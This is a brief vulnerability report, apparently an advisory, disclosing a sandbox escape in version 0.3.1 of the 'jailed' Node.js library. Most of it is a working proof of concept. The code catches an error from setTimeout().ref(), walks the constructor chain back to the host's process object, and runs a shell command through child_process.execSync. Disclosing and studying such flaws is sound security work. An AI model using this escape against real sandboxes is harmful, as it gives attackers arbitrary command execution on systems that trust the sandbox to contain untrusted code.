Sandbox Escape in jailed with Node.js

[seongil-wi]

• Jailed version: 0.3.1

• Node version: 18.15.0

• run-jailed.js

  var jailed = require('jailed');
  var api = {};
  var plugin = new jailed.Plugin('./test_case.js', api);

• test_case.js

  
  try{
  setTimeout().ref();
  } catch(pp){
  pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
  }

application.disconnect();

Sandbox can be escaped by calling `setTimeout().ref()` function.
Also, we can execute arbitrary shell code using process module.